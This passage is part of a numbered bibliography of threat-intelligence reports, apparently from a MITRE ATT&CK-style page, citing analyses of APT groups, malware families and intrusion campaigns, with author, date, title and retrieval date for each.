  288. Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020. 

  289. GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020. 

  290. Kaspersky Lab’s Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015. 

  291. Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020. 

  292. Kaspersky Lab. (2017, August). ShadowPad: popular server management software hit in supply chain attack. Retrieved March 22, 2021. 

  293. FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018. 

  294. Lambert, T. (2020, January 29). Intro to Netwire. Retrieved January 7, 2021. 

  295. Proofpoint. (2020, December 2). Geofenced NetWire Campaigns. Retrieved January 7, 2021. 

  296. Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020. 

  297. Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016. 

  298. Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016. 

  299. Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019. 

  300. Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020. 

  301. McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021. 

  302. Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019. 

  303. Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020. 

  304. Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020. 

  305. Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018. 

  306. Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018. 

  307. Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018. 

  308. The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021. 

  309. An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021. 

  310. S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019. 

  311. Cherepanov, Anton. (2019, November 10). ESETresearch discovered a trojanized IDA Pro installer. Retrieved March 2, 2022. 

  312. Pradhan, A. (2022, February 8). LolZarus: Lazarus Group Incorporating Lolbins into Campaigns. Retrieved March 22, 2022. 

  313. Saini, A. and Hossein, J. (2022, January 27). North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign. Retrieved January 27, 2022. 

  314. Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018. 

  315. Uptycs Threat Research Team. (2021, January 12). Confucius APT deploys Warzone RAT. Retrieved December 17, 2021. 

  316. Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020. 

  317. CERT-EE. (2021, January 27). Gamaredon Infection: From Dropper to Entry. Retrieved February 17, 2022. 

  318. Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020. 

  319. Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022. 

  320. Unit 42. (2022, February 3). Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022. 

  321. Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018. 

  322. Marczak, B. and Scott-Railton, J.. (2016, May 29). Keep Calm and (Don’t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016. 

  323. FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. 

  324. Martin Zugec. (2021, July 27). Deep Dive Into a FIN8 Attack - A Forensic Investigation. Retrieved September 1, 2021. 

  325. Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021. 

  326. Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021. 

  327. Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021. 

  328. Roccia, T., Seret, T., Fokker, J. (2021, March 16). Technical Analysis of Operation Dianxun. Retrieved April 13, 2021. 

  329. Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020. 

  330. Chen, J.. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020. 

  331. ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020. 

  332. Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019. 

  333. Jansen, W . (2021, January 12). Abusing cloud services to fly under the radar. Retrieved January 19, 2021. 

  334. Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018. 

  335. GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020. 

  336. Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021. 

  337. Rewterz. (2020, April 20). Sidewinder APT Group Campaign Analysis. Retrieved January 29, 2021. 

  338. Rewterz. (2020, June 22). Analysis on Sidewinder APT Group – COVID-19. Retrieved January 29, 2021. 

  339. ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018. 

  340. ESET Research. (2018, May 22). Turla Mosquito: A shift towards more generic tools. Retrieved July 3, 2018. 

  341. Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020. 

  342. FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020. 

  343. Dela Paz, R. (2016, October 21). BITTER: a targeted attack against Pakistan. Retrieved June 1, 2022. 

  344. Raghuprasad, C . (2022, May 11). Bitter APT adds Bangladesh to their targets. Retrieved June 1, 2022. 

  345. MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021. 

  346. NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021. 

  347. Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020. 

  348. Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018. 

  349. Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018. 

  350. Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018. 

  351. Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018. 

  352. Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020. 

  353. John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020. 

  354. Symantec Security Response Attack Investigation Team. (2018, April 23). Orangeworm: Indicators of Compromise. Retrieved July 8, 2018. 

  355. Unit42. (2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018. 

  356. Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019. 

  357. Vengerik, B. & Dennesen, K.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved January 15, 2019. 

  358. Vengerik, B. et al.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved December 17, 2018. 

  359. DFIR Report. (2021, November 15). Exchange Exploit Leads to Domain Wide Ransomware. Retrieved January 5, 2023. 

  360. DFIR Report. (2022, March 21). APT35 Automates Initial Access Using ProxyShell. Retrieved May 25, 2022. 

  361. Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017. 

  362. Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018. 

  363. Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017. 

  364. Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020. 

  365. Bromiley, M., et al.. (2019, July 18). Hard Pass: Declining APT34’s Invite to Join Their Professional Network. Retrieved August 26, 2019. 

  366. Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023. 

  367. Lechtik, M, and etl. (2021, July 14). LuminousMoth APT: Sweeping attacks for the chosen few. Retrieved October 20, 2022. 

  368. Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved November 15, 2018. 

  369. Malwarebytes Threat Intelligence Team. (2020, June 4). New LNK attack tied to Higaisa APT discovered. Retrieved March 2, 2021. 

  370. Singh, S. Singh, A. (2020, June 11). The Return on the Higaisa APT. Retrieved March 2, 2021. 

  371. Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021. 

  372. Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved August 4, 2022. 

  373. Fiser, D. Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021. 

  374. Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021. 

  375. Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018. 

  376. Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. 

  377. Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018. 

  378. Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023. 

  379. McAfee® Foundstone® Professional Services and McAfee Labs™. (2011, February 10). Global Energy Cyberattacks: “Night Dragon”. Retrieved February 19, 2018. 

  380. Cybereason Nocturnus. (2022, May 4). Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques. Retrieved September 22, 2022. 

  381. Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020. 

  382. Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021. 

  383. Adamitis, D. et al. (2019, June 4). It’s alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.